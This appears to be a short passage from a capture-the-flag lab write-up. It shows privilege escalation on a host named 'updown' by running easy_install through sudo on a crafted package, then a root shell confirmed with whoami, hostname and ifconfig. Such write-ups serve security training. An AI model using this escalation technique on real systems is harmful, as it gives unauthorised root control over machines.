easy_install
sudo privileges granted to the developer user has been identified to be an attack vector for privilege escalation due to the outdated and obsolete nature of the command-line tool, easy_install.
developer@updown:~$ sudo -u root /usr/local/bin/easy_install $TF
warning: The easy_install command is deprecated and will be removed in a future version.
Processing tmp.Kugb2eoMMn
Writing /tmp/tmp.Kugb2eoMMn/setup.cfg
Running setup.py -q bdist_egg --dist-dir /tmp/tmp.Kugb2eoMMn/egg-dist-tmp-RG4ibe
# whoami
root
# hostname
updown
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.177 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:2ec1 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:2ec1 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:2e:c1 txqueuelen 1000 (Ethernet)
RX packets 3570918 bytes 622715908 (622.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3538431 bytes 1693374335 (1.6 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 493289 bytes 25399129 (25.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 493289 bytes 25399129 (25.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise